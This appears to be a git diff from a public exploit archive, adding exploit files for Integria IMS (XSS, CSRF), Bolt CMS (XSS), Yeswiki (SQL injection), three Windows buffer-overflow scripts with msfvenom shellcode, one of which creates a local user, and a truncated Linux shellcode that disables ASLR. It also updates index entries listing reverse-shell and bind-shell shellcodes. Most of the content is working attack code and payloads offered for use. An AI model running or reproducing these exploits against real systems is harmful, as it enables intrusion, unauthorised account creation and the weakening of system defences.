https://hackpuntes.com/cve-2018-19828-integria-ims-5-0-83-cross-site-scripting-reflejado/ +# https://github.com/articaST/integriaims/commit/25d810b1c8e138e4b47d5cd14b2cd9b564f19b1e + +# 1. Technical Description: +# search_string parameter is vulnerable to Reflected Cross-Site Scripting (XSS) attacks +# through a GET request in index.php resource. + +# 2. Proof Of Concept (PoC): +# On the main page, go to the search form and add the following payload +# '> + +# 3. Payload +# http://[PATH]/index.php?search_string=%27%3E%3Cscript%3Ealert(%27PoC%20CVE-2018-19828%27)%3C%2Fscript%3E \ No newline at end of file diff --git a/exploits/php/webapps/46013.html b/exploits/php/webapps/46013.html new file mode 100644 index 000000000..2e132ae7f --- /dev/null +++ b/exploits/php/webapps/46013.html @@ -0,0 +1,41 @@ +# Exploit Title: Integria IMS 5.0.83 - Cross-Site Request Forgery +# Exploit Author: Javier Olmedo +# Website: https://hackpuntes.com +# Date: 2018-12-19 +# Google Dork: N/A +# Vendor: Artica ST +# Software Link: https://github.com/articaST/integriaims +# Affected Version: 5.0.83 and possibly before +# Patched Version: 5.0.84 +# Category: Web Application +# Platform: Windows & Ubuntu +# Tested on: Win10x64 & Kali Linux +# CVE: 2018-19829 +# References: +# https://hackpuntes.com/cve-2018-19829-integria-ims-5-0-83-cross-site-request-forgery/ +# https://github.com/articaST/integriaims/commit/a37c0c3d7cad74df64bfd3d98488aee4fa28b839 + +# 1. Technical Description: +# Integria IMS version 5.0.83 and possibly before are affected by Cross-Site Request Forgery +# vulnerability, an attacker could delete users through GET or POST requests. + +# 2.1 Proof Of Concept (Delete User): + +(Method 1 - GET) +Use Google URL Shortener (or similar) to shorten the next url +http://[PATH]/ajax.php?page=include/ajax/delete_item_general&delete_item=1&name=delete_user&id=[ID]) +and send it to the victim. + +(Method 2 - POST) +Use next form and send it tho the victim. + + + +
+ + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/46014.txt b/exploits/php/webapps/46014.txt new file mode 100644 index 000000000..71404f0ec --- /dev/null +++ b/exploits/php/webapps/46014.txt @@ -0,0 +1,37 @@ +# Exploit Title: Bolt CMS <3.6.2 - Cross-Site Scripting +# Google Dork: N/A +# Date: 2018-12-18 +# Exploit Author: Raif Berkay Dincel [ author=9567 ] +# Contact: www.raifberkaydincel.com +# Vendor Homepage: bolt.cm +# Vulnerable Software --> [ https://github.com/rdincel1/Bolt-CMS-3.6.2---Cross-Site-Scripting/raw/master/bolt-v3.6.2.zip ] +# Affected Version: [ < 3.6.2 ] +# CVE-ID: CVE-2018-19933 +# Tested on: Parrot Security OS / Linux Mint / Windows 10 + +# Vulnerable Parameter Type: POST +# Vulnerable Parameter: http://127.0.0.1:8000/preview/page +# Attack Pattern: + +# Description + +Bolt CMS <3.6.2 allows XSS via text input click preview button as demonstrated by the Title field of a Configured and New Entry. + +# PoC [Video]: https://youtu.be/3eTPyIpjCJg + +# Proof of Concepts: + +POST /preview/page HTTP/1.1 +Host: 127.0.0.1:8000 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://127.0.0.1:8000/bolt/editcontent/pages +Content-Type: application/x-www-form-urlencoded +Content-Length: 396 +Connection: close +Cookie: bolt_session_cf7976ea5999f8e272ce7cd50c84d240=14b61865131cf9422af970ae28a097b7; bolt_authtoken_cf7976ea5999f8e272ce7cd50c84d240=0b69633d5a549f19bf3faa88462b7b8e17ba57ba9dff6d25a708efe6dd6a9a04 +Upgrade-Insecure-Requests: 1 + +content_edit%5B_token%5D=jMmm41dJQXpXx3gwE_VQkA60fdsNo6DERJClPVkYh7U&editreferrer=&contenttype=pages&title=%3Cscript%3Ealert%28%22Raif%22%29%3C%2Fscript%3E&slug=script-alert-raif-script&image%5Bfile%5D=&files%5B%5D=&teaser=&body=&template=&taxonomy%5Bgroups%5D%5B%5D=&taxonomy-order%5Bgroups%5D=0&id=&status=draft&datepublish=2018-12-07+00%3A12%3A05&datedepublish=&ownerid=1&_live-editor-preview= \ No newline at end of file diff --git a/exploits/php/webapps/46015.txt b/exploits/php/webapps/46015.txt new file mode 100644 index 000000000..3ee96b807 --- /dev/null +++ b/exploits/php/webapps/46015.txt @@ -0,0 +1,19 @@ +# Exploit Title: SQL Injection in Yeswiki (Cercopitheque) +# Date: 02/07/2018 +# Exploit Author: Mickael BROUTY (@ark1nar) - FIDENS +# Vendor Homepage: https://yeswiki.net +# Software Link: https://repository.yeswiki.net/cercopitheque/yeswiki-cercopitheque-2018-12-07-1.zip +# Version: Yeswiki Cercopitheque 2018-06-19-1 +# Tested on: Kali linux +# CVE : CVE-2018-13045 + + +# POC: +# 1) +# http://localhost/[PATH]/?BaZar&vue=exporter&id=[SQL] +# + + +Exploitation example: + +http://localhost/[PATH]/?BaZar&vue=exporter&id=-1 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15# \ No newline at end of file diff --git a/exploits/windows/local/46008.py b/exploits/windows/local/46008.py new file mode 100755 index 000000000..873eb2e9a --- /dev/null +++ b/exploits/windows/local/46008.py @@ -0,0 +1,59 @@ +# Exploit Title: PassFab RAR Password Recovery SEH Local Exploit +# Date: 16-12-2018 +# Vendor Homepage:https://www.passfab.com/products/rar-password-recovery.html +# Software Link: https://www.passfab.com/downloads/passfab-rar-password-recovery.exe +# Exploit Author: Achilles +# Tested Version: 9.3.2 +# Tested on: Windows XP SP3 + + +# 1.- Run python code : PassFab_RAR +# 2.- Open EVIL.txt and copy content to clipboard +# 3.- Open PassFab RAR Password Recovery +# 4.- In the new Window click on the key in the upper right corner +# 5.- Paste the content of EVIL.txt into the Field: 'Licensed E-mail and Registration Code' +# 6.- Click 'Register'and the calculator will open +# 7.- Greetings go:XiDreamzzXi,Metatron + +#!/usr/bin/python + +#!/usr/bin/env python +buffer = "\x41" * 260 +NSEH = "\xeb\x06\x90\x90" #jmp short 6 +SEH = "\xdd\x74\x06\x10" #pop pop ret SoftwareLog.dll +nops = "\x90" * 20 + +#badchar \x00\ +#msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python +buf = "" +buf += "\xbf\xc6\xde\x94\x3e\xda\xd0\xd9\x74\x24\xf4\x5d" +buf += "\x31\xc9\xb1\x31\x31\x7d\x13\x03\x7d\x13\x83\xc5" +buf += "\xc2\x3c\x61\xc2\x22\x42\x8a\x3b\xb2\x23\x02\xde" +buf += "\x83\x63\x70\xaa\xb3\x53\xf2\xfe\x3f\x1f\x56\xeb" +buf += "\xb4\x6d\x7f\x1c\x7d\xdb\x59\x13\x7e\x70\x99\x32" +buf += "\xfc\x8b\xce\x94\x3d\x44\x03\xd4\x7a\xb9\xee\x84" +buf += "\xd3\xb5\x5d\x39\x50\x83\x5d\xb2\x2a\x05\xe6\x27" +buf += "\xfa\x24\xc7\xf9\x71\x7f\xc7\xf8\x56\x0b\x4e\xe3" +buf += "\xbb\x36\x18\x98\x0f\xcc\x9b\x48\x5e\x2d\x37\xb5" +buf += "\x6f\xdc\x49\xf1\x57\x3f\x3c\x0b\xa4\xc2\x47\xc8" +buf += "\xd7\x18\xcd\xcb\x7f\xea\x75\x30\x7e\x3f\xe3\xb3" +buf += "\x8c\xf4\x67\x9b\x90\x0b\xab\x97\xac\x80\x4a\x78" +buf += "\x25\xd2\x68\x5c\x6e\x80\x11\xc5\xca\x67\x2d\x15" +buf += "\xb5\xd8\x8b\x5d\x5b\x0c\xa6\x3f\x31\xd3\x34\x3a" +buf += "\x77\xd3\x46\x45\x27\xbc\x77\xce\xa8\xbb\x87\x05" +buf += "\x8d\x34\xc2\x04\xa7\xdc\x8b\xdc\xfa\x80\x2b\x0b" +buf += "\x38\xbd\xaf\xbe\xc0\x3a\xaf\xca\xc5\x07\x77\x26" +buf += "\xb7\x18\x12\x48\x64\x18\x37\x2b\xeb\x8a\xdb\x82" +buf += "\x8e\x2a\x79\xdb" + +payload = buffer + NSEH + SEH + nops + buf + + +try: + f=open("Evil.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/local/46009.py b/exploits/windows/local/46009.py new file mode 100755 index 000000000..c725255f0 --- /dev/null +++ b/exploits/windows/local/46009.py @@ -0,0 +1,108 @@ +#!/usr/bin/python + +#------------------------------------------------------------------------------------------------------------------------------------# +# Exploit: LanSpy 2.0.1.159 - Local Buffer Overflow RCE(PoC) # +# Date: 2018-12-16 # +# Author: Juan Prescotto # +# Tested Against: Win7 Pro SP1 64 bit # +# Software Download #1: https://www.exploit-db.com/apps/70a780b78ee7dbbbbc99852259f75d53-lanspy_setup_2.0.1.159.exe # +# Software Download #2: https://lizardsystems.com/download/lanspy_setup.exe # +# Version: 2.0.1.159 # +# Special Thanks to my wife for allowing me spend countless hours on this passion of mine # +# Credit: Thanks to Gionathan "John" Reale (https://www.exploit-db.com/exploits/45968) for his work on the Denial of Service exploit # +# Steps : Open the APP > click on the scan field > paste in contents from the .txt file that was generated by this script # +#------------------------------------------------------------------------------------------------------------------------------------# +# Bad Characers: \x00 thru \x20 and \x2c\x2d # +# EIP Offset: 680 # +# Non-Participating Modules: lanspy.exe # +#------------------------------------------------------------------------------------------------------------------------------------# +# Run LanSpy with Administrative Rights, when exploit.txt contents are pasted into scan field and run a Local User will be created: # +# User: Metasploit Password: MyPassword12 # +#------------------------------------------------------------------------------------------------------------------------------------# +# EIP overwrite --> JMP ECX --> Short Relative Reverse JMP --> Long Relative Reverse JMP --> NoPs --> Stack Adjustment --> Shellcode # +#------------------------------------------------------------------------------------------------------------------------------------# + +#msfvenom -p windows/adduser USER=metasploit PASS=MyPassword12 --bad-chars \x00\x01\x02\x03\x04\x05\x06\x07\x09\x0a\x0b\x0c\x0d\x0f\x10\x11\x12\x13\x14\x1a\x1b\x1c\x1d\x1e\x1f\x2c --format python -v shellcode +#Payload size: 626 bytes + +shellcode = "" +shellcode += "\x89\xe5\xda\xd1\xd9\x75\xf4\x5b\x53\x59\x49\x49" +shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43" +shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" +shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +shellcode += "\x39\x6c\x39\x78\x6b\x32\x65\x50\x45\x50\x73\x30" +shellcode += "\x31\x70\x6d\x59\x58\x65\x36\x51\x4f\x30\x43\x54" +shellcode += "\x6c\x4b\x56\x30\x70\x30\x6e\x6b\x63\x62\x54\x4c" +shellcode += "\x4e\x6b\x66\x32\x65\x44\x6c\x4b\x54\x32\x47\x58" +shellcode += "\x76\x6f\x68\x37\x30\x4a\x31\x36\x75\x61\x69\x6f" +shellcode += "\x6e\x4c\x75\x6c\x35\x31\x43\x4c\x55\x52\x36\x4c" +shellcode += "\x45\x70\x4b\x71\x78\x4f\x76\x6d\x65\x51\x69\x57" +shellcode += "\x6d\x32\x4c\x32\x33\x62\x53\x67\x4c\x4b\x61\x42" +shellcode += "\x42\x30\x6c\x4b\x31\x5a\x47\x4c\x6e\x6b\x50\x4c" +shellcode += "\x52\x31\x54\x38\x6a\x43\x47\x38\x75\x51\x7a\x71" +shellcode += "\x46\x31\x4c\x4b\x36\x39\x35\x70\x47\x71\x38\x53" +shellcode += "\x4e\x6b\x43\x79\x67\x68\x39\x73\x35\x6a\x73\x79" +shellcode += "\x4e\x6b\x34\x74\x6c\x4b\x75\x51\x6a\x76\x35\x61" +shellcode += "\x4b\x4f\x4c\x6c\x7a\x61\x48\x4f\x64\x4d\x67\x71" +shellcode += "\x68\x47\x37\x48\x6b\x50\x32\x55\x39\x66\x33\x33" +shellcode += "\x53\x4d\x4a\x58\x37\x4b\x43\x4d\x65\x74\x52\x55" +shellcode += "\x38\x64\x73\x68\x6e\x6b\x46\x38\x75\x74\x73\x31" +shellcode += "\x78\x53\x72\x46\x6e\x6b\x54\x4c\x30\x4b\x6e\x6b" +shellcode += "\x63\x68\x75\x4c\x36\x61\x58\x53\x6e\x6b\x47\x74" +shellcode += "\x6c\x4b\x35\x51\x68\x50\x4b\x39\x50\x44\x46\x44" +shellcode += "\x54\x64\x61\x4b\x73\x6b\x53\x51\x56\x39\x43\x6a" +shellcode += "\x53\x61\x6b\x4f\x79\x70\x63\x6f\x53\x6f\x62\x7a" +shellcode += "\x4e\x6b\x54\x52\x5a\x4b\x4e\x6d\x61\x4d\x72\x4a" +shellcode += "\x46\x61\x6c\x4d\x4d\x55\x78\x32\x57\x70\x55\x50" +shellcode += "\x63\x30\x52\x70\x62\x48\x34\x71\x6c\x4b\x32\x4f" +shellcode += "\x4b\x37\x59\x6f\x4e\x35\x6d\x6b\x6c\x30\x78\x35" +shellcode += "\x6e\x42\x71\x46\x61\x78\x59\x36\x6d\x45\x4f\x4d" +shellcode += "\x6f\x6d\x79\x6f\x4e\x35\x57\x4c\x57\x76\x43\x4c" +shellcode += "\x57\x7a\x4d\x50\x4b\x4b\x4d\x30\x61\x65\x43\x35" +shellcode += "\x4d\x6b\x31\x57\x54\x53\x44\x32\x52\x4f\x33\x5a" +shellcode += "\x75\x50\x72\x73\x4b\x4f\x69\x45\x73\x53\x50\x6d" +shellcode += "\x62\x44\x54\x6e\x51\x75\x44\x38\x65\x35\x31\x30" +shellcode += "\x66\x4f\x35\x33\x31\x30\x42\x4e\x33\x55\x61\x64" +shellcode += "\x77\x50\x52\x55\x63\x43\x50\x65\x61\x62\x67\x50" +shellcode += "\x52\x4d\x51\x75\x54\x34\x73\x51\x61\x63\x70\x70" +shellcode += "\x50\x6c\x70\x6f\x63\x59\x64\x34\x55\x70\x50\x4d" +shellcode += "\x31\x69\x50\x50\x70\x61\x74\x33\x44\x33\x54\x37" +shellcode += "\x42\x4f\x34\x32\x73\x54\x34\x71\x54\x72\x67\x50" +shellcode += "\x54\x6f\x32\x61\x51\x54\x77\x34\x71\x30\x76\x46" +shellcode += "\x36\x46\x31\x30\x30\x6e\x51\x75\x31\x64\x55\x70" +shellcode += "\x70\x6c\x42\x4f\x70\x63\x70\x61\x70\x6c\x70\x67" +shellcode += "\x72\x52\x30\x6f\x72\x55\x44\x30\x35\x70\x51\x51" +shellcode += "\x73\x54\x42\x4d\x55\x39\x72\x4e\x50\x69\x71\x63" +shellcode += "\x32\x54\x34\x32\x31\x71\x70\x74\x50\x6f\x54\x32" +shellcode += "\x64\x33\x51\x30\x30\x6d\x35\x35\x64\x34\x70\x61" +shellcode += "\x70\x73\x32\x50\x32\x4c\x70\x6f\x45\x39\x71\x64" +shellcode += "\x77\x50\x56\x4f\x72\x61\x43\x74\x63\x74\x63\x30" +shellcode += "\x41\x41" + +if len(shellcode) > 633: + exit("[+] Shellcode is too big! Shellcode must be smaller than 633 bytes") + +sled = "\x90" * 8 + +#Necessary to allow shellcode room to operate +stack_adjust = "\x83\xec\x78" * 10 + +reverse_jmp_long = "\xe9\x5c\xfd\xff\xff" + +reverse_jmp_short = "\x41\xeb\xf6\x41" + +junk = "\x41" * (680 - len(sled) - len(stack_adjust) - len(shellcode) - len(reverse_jmp_long) - len(reverse_jmp_short)) + +#004040AD JMP ECX (lanspy.exe) +eip = "\xad\x40\x40" + +payload = sled + stack_adjust + shellcode + junk + reverse_jmp_long + reverse_jmp_short + eip +try: + f=open("exploit.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/local/46016.py b/exploits/windows/local/46016.py new file mode 100755 index 000000000..9c1bdcc7c --- /dev/null +++ b/exploits/windows/local/46016.py @@ -0,0 +1,57 @@ +# Exploit Title: PDF Explorer SEH Local Exploit +# Original Discovery:Gionathan "John" Reale (DoS exploit) +# Exploit Author: Achilles +# Date: 18-12-2018 +# Vendor Homepage: http://www.rttsoftware.com/ +# Software Link: https://www.rttsoftware.com/files/PDFExplorerTrialSetup.zip +# Tested Version: 1.5.66.2 +# Tested on: Windows XP SP3 + + +# 1.- Run python code : PDF_Explorer.py +# 2.- Open EVIL.txt and copy content to clipboard +# 3.- Open PDF Explorer +# 4.- When inside the program click "Database" > "Custom fields settings... +" +# 5.- Paste the content of EVIL.txt into the Field:'Label'and the calculator will Open +# 7.- Greetings go:XiDreamzzXi,Metatron + + +#!/usr/bin/python +#!/usr/bin/env python +buffer =3D "\x41" * 292 +NSEH =3D "\xeb\x06\x90\x90" #jmp short 6 +SEH =3D "\x3f\x28\xd1\x72" #0x72d1283f pop eax # pop esi # ret 0x04 [msacm32.drv] +nops =3D "\x90" * 20 + +#msfvenom -p windows/exec CMD=3Dcalc.exe -b "\x00\x0a\x0d\x23\x80" -f pytho= +n +schellcode =3D ("\xda\xcb\xbf\xbd\x81\x73\x52\xd9\x74\x24\xf4\x5e\x29"=20 +"\xc9\xb1\x31\x31\x7e\x18\x03\x7e\x18\x83\xc6\xb9\x63" +"\x86\xae\x29\xe1\x69\x4f\xa9\x86\xe0\xaa\x98\x86\x97" +"\xbf\x8a\x36\xd3\x92\x26\xbc\xb1\x06\xbd\xb0\x1d\x28" +"\x76\x7e\x78\x07\x87\xd3\xb8\x06\x0b\x2e\xed\xe8\x32" +"\xe1\xe0\xe9\x73\x1c\x08\xbb\x2c\x6a\xbf\x2c\x59\x26" +"\x7c\xc6\x11\xa6\x04\x3b\xe1\xc9\x25\xea\x7a\x90\xe5" +"\x0c\xaf\xa8\xaf\x16\xac\x95\x66\xac\x06\x61\x79\x64" +"\x57\x8a\xd6\x49\x58\x79\x26\x8d\x5e\x62\x5d\xe7\x9d" +"\x1f\x66\x3c\xdc\xfb\xe3\xa7\x46\x8f\x54\x0c\x77\x5c" +"\x02\xc7\x7b\x29\x40\x8f\x9f\xac\x85\xbb\x9b\x25\x28" +"\x6c\x2a\x7d\x0f\xa8\x77\x25\x2e\xe9\xdd\x88\x4f\xe9" +"\xbe\x75\xea\x61\x52\x61\x87\x2b\x38\x74\x15\x56\x0e" +"\x76\x25\x59\x3e\x1f\x14\xd2\xd1\x58\xa9\x31\x96\x97" +"\xe3\x18\xbe\x3f\xaa\xc8\x83\x5d\x4d\x27\xc7\x5b\xce" +"\xc2\xb7\x9f\xce\xa6\xb2\xe4\x48\x5a\xce\x75\x3d\x5c" +"\x7d\x75\x14\x3f\xe0\xe5\xf4\xee\x87\x8d\x9f\xee") + +payload =3D buffer + NSEH + SEH + nops + schellcode + + +try: +f=open("Evil.txt","w") +print "[+] Creating %s bytes evil payload.." %len(payload) +f.write(payload) +f.close() +print "[+] File created!" +except: +print "File cannot be created" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8dd0eeddd..237d12eec 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -3177,7 +3177,7 @@ id,file,description,date,author,type,platform,port 24135,exploits/windows/dos/24135.html,"Microsoft Internet Explorer 5.0.1 - CSS Style Sheet Memory Corruption",2004-05-18,henkie_is_leet,dos,windows, 24142,exploits/windows/dos/24142.pl,"Mollensoft Lightweight FTP Server 3.6 - Remote Denial of Service",2004-05-24,storm,dos,windows, 24143,exploits/hardware/dos/24143.c,"VocalTec VGW120/VGW480 Telephony Gateway Remote H.225 - Denial of Service",2004-05-24,Alexander,dos,hardware, -24144,exploits/windows/dos/24144.txt,"MiniShare Server 1.3.2 - Remote Denial of Service",2004-05-26,"Donato Ferrante",dos,windows, +24144,exploits/windows/dos/24144.txt,"MiniShare 1.3.2 - Remote Denial of Service",2004-05-26,"Donato Ferrante",dos,windows, 24145,exploits/windows/dos/24145.c,"Orenosv HTTP/FTP Server 0.5.9 - GET Denial of Service (1)",2004-05-25,badpack3t,dos,windows, 24146,exploits/windows/dos/24146.bat,"Orenosv HTTP/FTP Server 0.5.9 - GET Denial of Service (2)",2004-06-02,CoolICE,dos,windows, 24147,exploits/windows/dos/24147.bat,"Orenosv HTTP/FTP Server 0.5.9 - GET Denial of Service (3)",2004-06-02,CoolICE,dos,windows, @@ -7486,7 +7486,7 @@ id,file,description,date,author,type,platform,port 15344,exploits/linux/local/15344.c,"Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite",2010-10-28,"Kees Cook",local,linux, 15376,exploits/windows/local/15376.c,"Trend Micro Titanium Maximum Security 2011 - Local Kernel",2010-11-01,"Nikita Tarakanov",local,windows, 15403,exploits/windows/local/15403.py,"MiniShare 1.4.0 < 1.5.5 - 'users.txt' Local Buffer Overflow",2010-11-02,"Chris Gabriel",local,windows, -15406,exploits/windows/local/15406.rb,"MiniShare 1.5.5 - Local Buffer Overflow (SEH)",2010-11-03,"Muhamad Fadzil Ramli",local,windows, +15406,exploits/windows/local/15406.rb,"MiniShare 1.5.5 - 'users.txt' Local Buffer Overflow (SEH)",2010-11-03,"Muhamad Fadzil Ramli",local,windows, 15417,exploits/windows/local/15417.pl,"GSPlayer 1.83a Win32 Release - Local Buffer Overflow",2010-11-04,moigai,local,windows, 15461,exploits/windows/local/15461.c,"G Data TotalCare 2011 - Local Kernel",2010-11-08,"Nikita Tarakanov",local,windows, 15475,exploits/multiple/local/15475.txt,"IBM OmniFind - Local Privilege Escalation",2010-11-09,"Fatih Kilic",local,multiple, @@ -10154,6 +10154,10 @@ id,file,description,date,author,type,platform,port 45985,exploits/windows/local/45985.rb,"CyberLink LabelPrint 2.5 - Stack Buffer Overflow (Metasploit)",2018-12-13,Metasploit,local,windows, 45988,exploits/windows/local/45988.py,"Zortam MP3 Media Studio 24.15 - Local Buffer Overflow (SEH)",2018-12-14,"Manpreet Singh Kheberi",local,windows, 46005,exploits/windows/local/46005.py,"Nsauditor 3.0.28.0 - Local SEH Buffer Overflow",2018-12-18,Achilles,local,windows, +46006,exploits/linux/local/46006.c,"Linux Kernel 4.4 - 'rtnetlink' Stack Memory Disclosure",2018-12-19,"Jinbum Park",local,linux, +46008,exploits/windows/local/46008.py,"PassFab RAR 9.3.2 - Buffer Overflow (SEH)",2018-12-19,Achilles,local,windows, +46009,exploits/windows/local/46009.py,"LanSpy 2.0.1.159 - Local Buffer Overflow",2018-12-19,"Juan Prescotto",local,windows, +46016,exploits/windows/local/46016.py,"PDF Explorer 1.5.66.2 - Buffer Overflow (SEH)",2018-12-19,Achilles,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -11456,7 +11460,7 @@ id,file,description,date,author,type,platform,port 9862,exploits/hardware/remote/9862.txt,"3Com OfficeConnect - Code Execution",2009-10-19,"Andrea Fabizi",remote,hardware, 9886,exploits/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer Buffer Overflow (Metasploit)",2009-10-16,"Pankaj Kohli_ Trancer",remote,windows, 9893,exploits/windows/remote/9893.txt,"Microsoft Internet Explorer 5/6/7 - Memory Corruption (MS09-054)",2009-10-15,Skylined,remote,windows,80 -9896,exploits/windows/remote/9896.txt,"MiniShare HTTP 1.5.5 - Remote Buffer Overflow",2009-10-19,iM4n,remote,windows,80 +9896,exploits/windows/remote/9896.txt,"MiniShare 1.5.5 - Remote Buffer Overflow",2009-10-19,iM4n,remote,windows,80 9900,exploits/windows/remote/9900.txt,"NaviCOPA 3.0.1.2 - Source Disclosure",2009-10-14,Dr_IDE,remote,windows, 9902,exploits/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 - Remote Buffer Overflow",2009-10-26,"karak0rsan_ murderkey",remote,windows,80 9905,exploits/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 < 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow",2009-10-30,"Dennis Yurichev",remote,windows,1521 @@ -17013,7 +17017,7 @@ id,file,description,date,author,type,platform,port 45952,exploits/windows/remote/45952.rb,"HP Intelligent Management - Java Deserialization RCE (Metasploit)",2018-12-04,Metasploit,remote,windows,8080 45986,exploits/hardware/remote/45986.py,"Cisco RV110W - Password Disclosure / Command Execution",2018-12-14,RySh,remote,hardware,443 45998,exploits/macos/remote/45998.rb,"Safari - Proxy Object Type Confusion (Metasploit)",2018-12-14,Metasploit,remote,macos, -45999,exploits/windows/remote/45999.txt,"MiniShare 1.4.1 - Remote Buffer Overflow HEAD and POST Method",2018-12-18,"Rafael Pedrero",remote,windows,80 +45999,exploits/windows/remote/45999.txt,"MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow",2018-12-18,"Rafael Pedrero",remote,windows,80 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -40501,3 +40505,10 @@ id,file,description,date,author,type,platform,port 45995,exploits/php/webapps/45995.txt,"Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution",2018-12-14,"Ihsan Sencan",webapps,php, 45997,exploits/php/webapps/45997.txt,"Double Your Bitcoin Script Automatic - Authentication Bypass",2018-12-14,Veyselxan,webapps,php, 46000,exploits/xml/webapps/46000.txt,"SDL Web Content Manager 8.5.0 - XML External Entity Injection",2018-12-18,"Ahmed Elhady Mohamed",webapps,xml, +46010,exploits/php/webapps/46010.html,"Hotel Booking Script 3.4 - Cross-Site Request Forgery (Change Admin Password)",2018-12-19,"Sainadh Jamalpur",webapps,php,80 +46011,exploits/php/webapps/46011.rb,"Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)",2018-12-19,AkkuS,webapps,php, +46012,exploits/php/webapps/46012.txt,"Integria IMS 5.0.83 - 'search_string' Cross-Site Scripting",2018-12-19,"Javier Olmedo",webapps,php,80 +46013,exploits/php/webapps/46013.html,"Integria IMS 5.0.83 - Cross-Site Request Forgery",2018-12-19,"Javier Olmedo",webapps,php,80 +46014,exploits/php/webapps/46014.txt,"Bolt CMS < 3.6.2 - Cross-Site Scripting",2018-12-19,"Raif Berkay Dincel",webapps,php,80 +46015,exploits/php/webapps/46015.txt,"Yeswiki Cercopitheque - 'id' SQL Injection",2018-12-19,"Mickael BROUTY",webapps,php,80 +46017,exploits/multiple/webapps/46017.txt,"IBM Operational Decision Manager 8.x - XML External Entity Injection",2018-12-19,"Mohamed M.Fouad",webapps,multiple,9443 diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 60c3ec110..912b07553 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -926,3 +926,4 @@ id,file,description,date,author,type,platform 45940,shellcodes/linux/45940.nasm,"Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)",2018-12-04,Nelis,shellcode,linux 45943,shellcodes/linux_x86-64/45943.c,"Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)",2018-12-04,"Kağan Çapar",shellcode,linux_x86-64 45980,shellcodes/linux_x86/45980.c,"Linux/x86 - Bind (1337/TCP) Ncat (/usr/bin/ncat) Shell (/bin/bash) + Null-Free Shellcode (95 bytes)",2018-12-11,T3jv1l,shellcode,linux_x86 +46007,shellcodes/linux_x86-64/46007.c,"Linux/x64 - Disable ASLR Security Shellcode (93 Bytes)",2018-12-19,"Kağan Çapar",shellcode,linux_x86-64 diff --git a/shellcodes/linux_x86-64/46007.c b/shellcodes/linux_x86-64/46007.c new file mode 100644 index 000000000..c9d7de699 --- /dev/null +++ b/shellcodes/linux_x86-64/46007.c @@ -0,0 +1,85 @@ +/* + ASLR (Address Space Layout Randomization) Disable Shellcode Language C & ASM - Linux/x86_64 + + Author : Kağan Çapar + contact: kagancapar@gmail.com + shellcode len : 93 bytes + compilation: gcc -fno-stack-protector -z execstack [.c] -o [] + + Test: + run shellcode (./aslr etc.) + check : cat /proc/sys/kernel/randomize_va_space + you will see "0" + + Assembly: + + global _start + section .ASLR + _start: + + #6A3B push byte +0x3b + #58 pop eax + #99 cdq + #48 dec eax + #BB2F62696E mov ebx,0x6e69622f + #2F das + #7368 jnc 0x75 + #005348 add [ebx+0x48],dl + #89E7 mov edi,esp + #682D630000 push dword 0x632d + #48 dec eax + #89E6 mov esi,esp + #52 push edx + #E836000000 call 0x56 + #6563686F arpl [gs:eax+0x6f],bp + #2030 and [eax],dh + #207C2073 and [eax+0x73],bh + #7564 jnz 0x90 + #6F outsd + #20746565 and [ebp+0x65],dh + #202F and [edi],ch + #7072 jo 0xa7 + #6F outsd + #632F arpl [edi],bp + #7379 jnc 0xb3 + #732F jnc 0x6b + #6B65726E imul esp,[ebp+0x72],byte +0x6e + #656C gs insb + #2F das + #7261 jc 0xa6 + #6E outsb + #646F fs outsd + #6D insd + #697A655F76615F imul edi,[edx+0x65],dword 0x5f61765f + #7370 jnc 0xc2 + #61 popa + #636500 arpl [ebp+0x0],sp + #56 push esi + #57 push edi + #48 dec eax + #89E6 mov esi,esp + #0F05 syscall + +*/ + +#include +#include + +unsigned char ASLR[] = \ +"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53" 